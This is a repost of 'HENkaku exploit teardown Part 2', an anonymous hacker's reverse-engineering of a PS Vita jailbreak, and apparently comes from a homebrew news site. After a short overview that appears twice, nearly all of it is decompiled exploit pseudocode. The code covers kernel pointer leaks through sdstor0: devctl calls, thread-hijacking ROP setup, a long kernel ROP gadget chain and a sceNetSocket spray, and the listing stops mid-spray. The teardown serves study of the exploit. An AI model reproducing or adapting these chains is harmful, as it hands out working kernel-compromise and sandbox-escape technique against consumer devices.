Last week we saw Part 1 of the HENkaku Exploit Teardown by an anonymous PS Vita Hacker known as H, and today H returns with Part 2 of his HENkaku Exploit Teardown below from Pastebin.com via notzecoxao! 
To quote: HENkaku exploit teardown - Part 2
- Stage 3 (ROP payload 2):
The second payload is composed by another ROP chain and data. It creates two userland threads (each one with it's own ROP chain), that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).
- Stage 4 (kernel ROP):
The second ROP payload prepares the stage for a kernel attack. After it's done, another ROP chain should be starting on the kernel side. This chain relies on kernel pointers that were leaked during the second payload's execution and is built beforehand. The data portion of the chain is additionally obfuscated/encrypted with kernel-only functions.
To further reverse the exploit, one must dump the target kernel modules, rebuild the kernel ROP and deobfuscate/decrypt the data region.
To be continued...
~ H.
To quote: HENkaku exploit teardown - Part 2
- Stage 3 (ROP payload 2):
The second payload is composed by another ROP chain and data. It creates two userland threads (each one with it's own ROP chain), that take care of leaking kernel pointers (by issuing devctl commands to "sdstor0:") and breaking the userland sandbox (by exploiting sceNet functions).
Code:
// Copy SD card device path and param
strcpy(x_stack + 0x000086B4, "sdstor0:");
strcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf
// From x_stack + 0x00006F34 to x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0x00000000, 0x00000400);
// Copy dummy device path
strcpy(x_stack + 0x000086E4, "molecule0:");
// Mount path?
sceLibKernel_A4AD("molecule0:");
// Send command 0x05 to "sdstor0:"
sceIoDevctl("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);
// Store leaked kernel pointer 1
// Comes from devctl_outbuf + 0x3D4
0x00(x_stack + 0x00008464) = 0x00(x_stack + 0x00007308) + 0xFFFFA8B9
// Create "pln" thread
// "pln" == "pointer leak n"?
// Entry (0x000054C8): LDMIA R1,{R1,R2,R4,R8,R11,SP,PC}
int thread_id = sceKernelCreateThread("pln", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);
// Store "pln" thread's ID
0x00(x_stack + 0x00008E94) = thread_id
// Store SceKernelThreadInfo size
0x00(x_stack + 0x0000862C) = 0x7C
// Get thread info structure
sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);
// Save pln_threadinfo.stack + 0x00001000
0x00(x_stack + 0x00008EA0) = 0x00(x_stack + 0x00008660) + 0x00001000
// Stack parameters for "pln" ROP chain
0x00(x_stack + 0x00008954) = 0x00000014
0x00(x_stack + 0x00008958) = x_stack + 0x00006F34
0x00(x_stack + 0x0000895C) = 0x000003FF
// Stack parameters for "pln" ROP chain
0x00(x_stack + 0x0000896C) = 0x00000400
0x00(x_stack + 0x00008970) = 0x00000000
0x00(x_stack + 0x00008974) = 0x00000000
// Setup "pln" ROP chain
0x00(x_stack + 0x00008708) = 0x008DD9B5
0x00(x_stack + 0x0000870C) = 0x000086E4
0x00(x_stack + 0x00008710) = 0x00000000
0x00(x_stack + 0x00008714) = 0x00000000
0x00(x_stack + 0x00008718) = 0x00000000
0x00(x_stack + 0x0000871C) = 0x0000A4AD
0x00(x_stack + 0x00008720) = 0x00000000
0x00(x_stack + 0x00008724) = 0x000FCDBB
0x00(x_stack + 0x00008728) = 0x00000000
0x00(x_stack + 0x0000872C) = 0x008DD9B5
0x00(x_stack + 0x00008730) = 0x000086B4
0x00(x_stack + 0x00008734) = 0x00000005
0x00(x_stack + 0x00008738) = 0x000086CC
0x00(x_stack + 0x0000873C) = 0x00008954
0x00(x_stack + 0x00008740) = 0x0000690C
0x00(x_stack + 0x00008744) = 0x00000000
0x00(x_stack + 0x00008748) = 0x000FCDBB
0x00(x_stack + 0x0000874C) = 0x00000000
0x00(x_stack + 0x00008750) = 0x008DD9B5
0x00(x_stack + 0x00008754) = 0x000F4240
0x00(x_stack + 0x00008758) = 0x00000000
0x00(x_stack + 0x0000875C) = 0x00000000
0x00(x_stack + 0x00008760) = 0x00000000
0x00(x_stack + 0x00008764) = 0x00018544
0x00(x_stack + 0x00008768) = 0x00000000
0x00(x_stack + 0x0000876C) = 0x000FCDBB
0x00(x_stack + 0x00008770) = 0x00000000
0x00(x_stack + 0x00008774) = 0x008DD9B5
0x00(x_stack + 0x00008778) = 0x000086B4
0x00(x_stack + 0x0000877C) = 0x00000005
0x00(x_stack + 0x00008780) = 0x00007444
0x00(x_stack + 0x00008784) = 0x0000896C
0x00(x_stack + 0x00008788) = 0x0000690C
0x00(x_stack + 0x0000878C) = 0x00000000
0x00(x_stack + 0x00008790) = 0x000FCDBB
0x00(x_stack + 0x00008794) = 0x00000000
0x00(x_stack + 0x00008798) = 0x00000519
/*
"pln" ROP
// Mount path?
sceLibKernel_A4AD("molecule0:");
// Send devctl 0x05
sceIoDevctl_syscall("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014, x_stack + 0x00006F34, 0x000003FF);
// Delay for a while
sceKernelDelayThread(1000000);
// Send devctl 0x05 again using
// input buffer from x_stack + 0x00007444 to x_stack + 0x00007844
sceIoDevctl_syscall("sdstor0:", 0x00000005, x_stack + 0x00007444, 0x00000400, 0x00000000, 0x00000000);
// Deadlock
sceWebkit_519();
*/
// Copy "pln" ROP chain into "pln" thread's stack
memcpy(0x00(x_stack + 0x00008EA0), x_stack + 0x00008708, 0x00000100);
// Set stack pointer
0x00(x_stack + 0x00008830) = x_stack + 0x00008EA0
// Set PC
0x00(x_stack + 0x00008834) = 0x000C048B // POP {PC}
// Start "pln" thread
// Thread arguments are loaded into R1 and the gadget
// at the thread's entrypoint then loads register values
// from it, overwritting SP and PC and triggering the
// ROP chain
sceKernelStartThread(thread_id, 0x0000001C, x_stack + 0x0000881C);
// Delay for a while
sceKernelDelayThread(100000);
// Store leaked kernel pointer 2
// Comes from devctl_outbuf + 0x3C4
0x00(x_stack + 0x00008458) = 0x00(x_stack + 0x000072F8) + 0xFFFFF544
// Setup pointer to leaked address in kernel module 1
0x00(x_stack + 0x00007444) = 0x00(x_stack + 0x00008464) + 0x0001E460
// Setup pointer to leaked address in kernel module 2
0x00(x_stack + 0x00008EAC) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000300
// Setup kernel mode ROP chain
0x00(x_stack + 0x00008A8C) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008A90) = 0x08106803
0x00(x_stack + 0x00008A94) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
0x00(x_stack + 0x00008A98) = 0x00000038
0x00(x_stack + 0x00008A9C) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008AA0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AA4) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008AA8) = 0x00(x_stack + 0x00008464) + 0x0001B571
0x00(x_stack + 0x00008AAC) = 0x00000000
0x00(x_stack + 0x00008AB0) = 0x00(x_stack + 0x00008464) + 0x00001E43
0x00(x_stack + 0x00008AB4) = 0x00000000
0x00(x_stack + 0x00008AB8) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008ABC) = 0x00(x_stack + 0x00008464) + 0x0000EA73
0x00(x_stack + 0x00008AC0) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008AC4) = 0x00(x_stack + 0x00008464) + 0x00027913
0x00(x_stack + 0x00008AC8) = 0x00(x_stack + 0x00008464) + 0x0000A523
0x00(x_stack + 0x00008ACC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AD0) = 0x00(x_stack + 0x00008464) + 0x00000CE3
0x00(x_stack + 0x00008AD4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AD8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008ADC) = 0x00(x_stack + 0x00008464) + 0x00000067
0x00(x_stack + 0x00008AE0) = 0x00(x_stack + 0x00008464) + 0x0000587F
0x00(x_stack + 0x00008AE4) = 0x00(x_stack + 0x00008464) + 0x00019713
0x00(x_stack + 0x00008AE8) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008AEC) = 0x00(x_stack + 0x00008464) + 0x00001E1D
0x00(x_stack + 0x00008AF0) = 0x00000000
0x00(x_stack + 0x00008AF4) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008AF8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008AFC) = 0x00(x_stack + 0x00008464) + 0x00001603
0x00(x_stack + 0x00008B00) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B04) = 0x00(x_stack + 0x00008464) + 0x00001F17
0x00(x_stack + 0x00008B08) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B0C) = 0x00(x_stack + 0x00008464) + 0x00000031
0x00(x_stack + 0x00008B10) = 0x00(x_stack + 0x00008464) + 0x0000B913
0x00(x_stack + 0x00008B14) = 0x00(x_stack + 0x00008464) + 0x00023B61
0x00(x_stack + 0x00008B18) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B1C) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008B20) = 0x00(x_stack + 0x00008464) + 0x000232EB
0x00(x_stack + 0x00008B24) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B28) = 0x00(x_stack + 0x00008464) + 0x0001B571
0x00(x_stack + 0x00008B2C) = 0x00(x_stack + 0x00008464) + 0x00023B61
0x00(x_stack + 0x00008B30) = 0x00(x_stack + 0x00008464) + 0x000232F1
0x00(x_stack + 0x00008B34) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008B38) = 0x00(x_stack + 0x00008464) + 0x00000AE1
0x00(x_stack + 0x00008B3C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B40) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008B44) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008B48) = 0x00000010
0x00(x_stack + 0x00008B4C) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B50) = 0x00(x_stack + 0x00008464) + 0x00012B11
0x00(x_stack + 0x00008B54) = 0x00(x_stack + 0x00008464) + 0x00000CE3
0x00(x_stack + 0x00008B58) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008B5C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B60) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008B64) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B68) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008B6C) = 0x00(x_stack + 0x00008464) + 0x0001FDC5
0x00(x_stack + 0x00008B70) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
0x00(x_stack + 0x00008B74) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B78) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B7C) = 0x00(x_stack + 0x00008464) + 0x00011C5F
0x00(x_stack + 0x00008B80) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008B84) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B88) = 0x00(x_stack + 0x00008464) + 0x0000B913
0x00(x_stack + 0x00008B8C) = 0x00000000
0x00(x_stack + 0x00008B90) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008B94) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008B98) = 0x00(x_stack + 0x00008464) + 0x00001861
0x00(x_stack + 0x00008B9C) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008BA0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BA4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BA8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BAC) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008BB0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BB4) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008BB8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BBC) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BC0) = 0x00(x_stack + 0x00008464) + 0x0001614D
0x00(x_stack + 0x00008BC4) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008BC8) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BCC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BD0) = 0x00(x_stack + 0x00008464) + 0x000000AF
0x00(x_stack + 0x00008BD4) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008BD8) = 0x00(x_stack + 0x00008464) + 0x0001EFE1
0x00(x_stack + 0x00008BDC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BE0) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008BE4) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008BE8) = 0x00(x_stack + 0x00008464) + 0x00001347
0x00(x_stack + 0x00008BEC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008BF0) = 0x00(x_stack + 0x00008464) + 0x000000B9
0x00(x_stack + 0x00008BF4) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008BF8) = 0x00(x_stack + 0x00008464) + 0x00001347
0x00(x_stack + 0x00008BFC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C00) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C04) = 0x00000000
0x00(x_stack + 0x00008C08) = 0x00(x_stack + 0x00008464) + 0x0001CB95
0x00(x_stack + 0x00008C0C) = 0x00(x_stack + 0x00008464) + 0x0001EA93
0x00(x_stack + 0x00008C10) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008C14) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C18) = 0x00(x_stack + 0x00008464) + 0x000209D7
0x00(x_stack + 0x00008C1C) = 0x00(x_stack + 0x00008464) + 0x000209D3
0x00(x_stack + 0x00008C20) = 0x00(x_stack + 0x00008464) + 0x00001411
0x00(x_stack + 0x00008C24) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C28) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
0x00(x_stack + 0x00008C2C) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008C30) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C34) = 0x00(x_stack + 0x00008464) + 0x0000652B
0x00(x_stack + 0x00008C38) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C3C) = 0x00(x_stack + 0x00008464) + 0x0001BAF5
0x00(x_stack + 0x00008C40) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008C44) = 0xFFFFFEB0
0x00(x_stack + 0x00008C48) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C5C) = 0x00000040
0x00(x_stack + 0x00008C50) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008C54) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C58) = 0x00(x_stack + 0x00008464) + 0x0000652B
0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C60) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008C64) = 0x00000040
0x00(x_stack + 0x00008C68) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008C6C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008C70) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
0x00(x_stack + 0x00008C74) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008C78) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008C7C) = 0x00(x_stack + 0x00008464) + 0x0001D8DB
0x00(x_stack + 0x00008C80) = 0x00000038
0x00(x_stack + 0x00008C84) = 0x00(x_stack + 0x00008464) + 0x000000AB
0x00(x_stack + 0x00008C88) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008C8C) = 0x00(x_stack + 0x00008464) + 0x0002328B
0x00(x_stack + 0x00008C90) = 0x00(x_stack + 0x00008464) + 0x00022FCD
0x00(x_stack + 0x00008C94) = 0x00(x_stack + 0x00008464) + 0x000000D1
0x00(x_stack + 0x00008C98) = 0x00(x_stack + 0x00008464) + 0x0001EFF1
0x00(x_stack + 0x00008C9C) = 0x00(x_stack + 0x00008464) + 0x0002A117
0x00(x_stack + 0x00008CA0) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CA4) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008CA8) = 0x00(x_stack + 0x00008464) + 0x00019399
0x00(x_stack + 0x00008CAC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CB0) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CB4) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
0x00(x_stack + 0x00008CB8) = 0xFFFFFEB0
0x00(x_stack + 0x00008CBC) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008CC0) = 0x00000040
0x00(x_stack + 0x00008CC4) = 0x00(x_stack + 0x00008464) + 0x00022A49
0x00(x_stack + 0x00008CC8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CCC) = 0x00(x_stack + 0x00008464) + 0x00003D73
0x00(x_stack + 0x00008CD0) = 0x00000000
0x00(x_stack + 0x00008CD4) = 0x00(x_stack + 0x00008464) + 0x000021FD
0x00(x_stack + 0x00008CD8) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CDC) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008CE0) = 0x00(x_stack + 0x00008464) + 0x00000AE1
0x00(x_stack + 0x00008CE4) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CE8) = 0x00(x_stack + 0x00008464) + 0x0002A117
0x00(x_stack + 0x00008CEC) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008CF0) = 0x00(x_stack + 0x00008464) + 0x0001F2B1
0x00(x_stack + 0x00008CF4) = 0x00(x_stack + 0x00008464) + 0x00000067
0x00(x_stack + 0x00008CF8) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008CFC) = 0x00(x_stack + 0x00008464) + 0x0001BF47
0x00(x_stack + 0x00008D00) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D04) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008D08) = 0x00(x_stack + 0x00008464) + 0x0000AF33
0x00(x_stack + 0x00008D0C) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D10) = 0x00(x_stack + 0x00008464) + 0x0001D9EB
0x00(x_stack + 0x00008D14) = 0x00000000
0x00(x_stack + 0x00008D18) = 0x00(x_stack + 0x00008464) + 0x0001FC6D
0x00(x_stack + 0x00008D1C) = 0x00(x_stack + 0x00008464) + 0x0000EA73
0x00(x_stack + 0x00008D20) = 0x00(x_stack + 0x00008464) + 0x0000039B
0x00(x_stack + 0x00008D24) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D28) = 0xFFFFFFFF
0x00(x_stack + 0x00008D2C) = 0x08106803
0x00(x_stack + 0x00008D30) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008D34) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D38) = 0x00(x_stack + 0x00008464) + 0x00000433
0x00(x_stack + 0x00008D3C) = 0x00(x_stack + 0x00008464) + 0x000233D3
0x00(x_stack + 0x00008D40) = 0x00(x_stack + 0x00008464) + 0x000150A3
0x00(x_stack + 0x00008D44) = 0x00000000
0x00(x_stack + 0x00008D48) = 0x00(x_stack + 0x00008464) + 0x0000A74D
0x00(x_stack + 0x00008D4C) = 0x00(x_stack + 0x00008464) + 0x00000000
0x00(x_stack + 0x00008D50) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D54) = 0x00(x_stack + 0x00008464) + 0x0001BF1F
0x00(x_stack + 0x00008D58) = 0x00000000
0x00(x_stack + 0x00008D5C) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008D60) = 0x00(x_stack + 0x00008464) + 0x00000347
0x00(x_stack + 0x00008D64) = 0x00(x_stack + 0x00008464) + 0x000050E9
0x00(x_stack + 0x00008D68) = 0x00(x_stack + 0x00008464) + 0x00001605
0x00(x_stack + 0x00008D6C) = 0x00(x_stack + 0x00008464) + 0x00022FCD
0x00(x_stack + 0x00008D70) = 0x00(x_stack + 0x00008464) + 0x000039EB
0x00(x_stack + 0x00008D74) = 0x00(x_stack + 0x00008464) + 0x00000853
0x00(x_stack + 0x00008D78) = 0x00(x_stack + 0x00008464) + 0x00011C5F
// Overwrite specific NULLs in the ROP chain
0x00(x_stack + 0x00008C04) = 0x00(x_stack + 0x00008EAC)
0x00(x_stack + 0x00008B48) = 0x00000090
0x00(x_stack + 0x00008CC0) = 0x00000240
0x00(x_stack + 0x00008D58) = 0x00000200
0x00(x_stack + 0x00008D14) = 0x00008FC0
// Copy kernel ROP chain
memcpy(x_stack + 0x00007448, x_stack + 0x00008A8C, 0x300);
// Copy the first 0x400 bytes of "obfuscated" data
// and append them at the bottom of the ROP chain
memcpy(x_stack + 0x00007744, x_stack + 0x00008EB8, 0x400);
// Set kernel thread SP, PC, UNK
0x00(x_stack + 0x00008858) = 0x00(x_stack + 0x00008458) + 0x000006DC
0x00(x_stack + 0x0000884C) = 0x00(x_stack + 0x00008458) + 0x000006F8 + 0x00000004
0x00(x_stack + 0x00008850) = 0x00(x_stack + 0x00008464) + 0x00000347
// Create "mhm" thread
// "mhm" == "move heap memory"?
// Entry (0x000054C8): LDMIA R1, {R1,R2,R4,R8,R11,SP,PC}
int thread_id = sceKernelCreateThread("mhm", 0x000054C8, 0x10000100, 0x00002000, 0x00000000, 0x00000000, 0x00000000);
// Store "mhm" thread's ID
0x00(x_stack + 0x00008620) = thread_id
// Store SceKernelThreadInfo size
0x00(x_stack + 0x0000862C) = 0x0000007C
// Get "mhm" thread's info structure
sceKernelGetThreadInfo(thread_id, x_stack + 0x0000862C);
// Store mhm_threadinfo.stack + 0x00001000
0x00(x_stack + 0x000086FC) = 0x00(x_stack + 0x00008660) + 0x00001000
// Spam sceNetSocket requests
// sceNetSocket("x", AF_INET, SOCK_STREAM, 0);
0x00(x_stack + 0x00008470) = sceNetSocket(x_stack + 0x00010388, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008474) = sceNetSocket(x_stack + 0x00010390, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008478) = sceNetSocket(x_stack + 0x00010398, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000847C) = sceNetSocket(x_stack + 0x000103A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008480) = sceNetSocket(x_stack + 0x000103A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008484) = sceNetSocket(x_stack + 0x000103B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008488) = sceNetSocket(x_stack + 0x000103B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000848C) = sceNetSocket(x_stack + 0x000103C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008490) = sceNetSocket(x_stack + 0x000103C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008494) = sceNetSocket(x_stack + 0x000103D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008498) = sceNetSocket(x_stack + 0x000103D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000849C) = sceNetSocket(x_stack + 0x000103E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A0) = sceNetSocket(x_stack + 0x000103E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A4) = sceNetSocket(x_stack + 0x000103F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084A8) = sceNetSocket(x_stack + 0x000103F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084AC) = sceNetSocket(x_stack + 0x00010400, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B0) = sceNetSocket(x_stack + 0x00010408, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B4) = sceNetSocket(x_stack + 0x00010410, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084B8) = sceNetSocket(x_stack + 0x00010418, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084BC) = sceNetSocket(x_stack + 0x00010420, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C0) = sceNetSocket(x_stack + 0x00010428, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C4) = sceNetSocket(x_stack + 0x00010430, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084C8) = sceNetSocket(x_stack + 0x00010438, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084CC) = sceNetSocket(x_stack + 0x00010440, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D0) = sceNetSocket(x_stack + 0x00010448, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D4) = sceNetSocket(x_stack + 0x00010450, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084D8) = sceNetSocket(x_stack + 0x00010458, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084DC) = sceNetSocket(x_stack + 0x00010460, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E0) = sceNetSocket(x_stack + 0x00010468, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E4) = sceNetSocket(x_stack + 0x00010470, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084E8) = sceNetSocket(x_stack + 0x00010478, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084EC) = sceNetSocket(x_stack + 0x00010480, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F0) = sceNetSocket(x_stack + 0x00010488, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F4) = sceNetSocket(x_stack + 0x00010490, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084F8) = sceNetSocket(x_stack + 0x00010498, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x000084FC) = sceNetSocket(x_stack + 0x000104A0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008500) = sceNetSocket(x_stack + 0x000104A8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008504) = sceNetSocket(x_stack + 0x000104B0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008508) = sceNetSocket(x_stack + 0x000104B8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000850C) = sceNetSocket(x_stack + 0x000104C0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008510) = sceNetSocket(x_stack + 0x000104C8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008514) = sceNetSocket(x_stack + 0x000104D0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008518) = sceNetSocket(x_stack + 0x000104D8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000851C) = sceNetSocket(x_stack + 0x000104E0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008520) = sceNetSocket(x_stack + 0x000104E8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008524) = sceNetSocket(x_stack + 0x000104F0, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008528) = sceNetSocket(x_stack + 0x000104F8, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x0000852C) = sceNetSocket(x_stack + 0x00010500, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008530) = sceNetSocket(x_stack + 0x00010508, 0x00000002, 0x00000001, 0x00000000);
0x00(x_stack + 0x00008534) = sceNetSocket(x_stack + 0x00010510, 0x00000002, 0x00000001, 0x00000000);
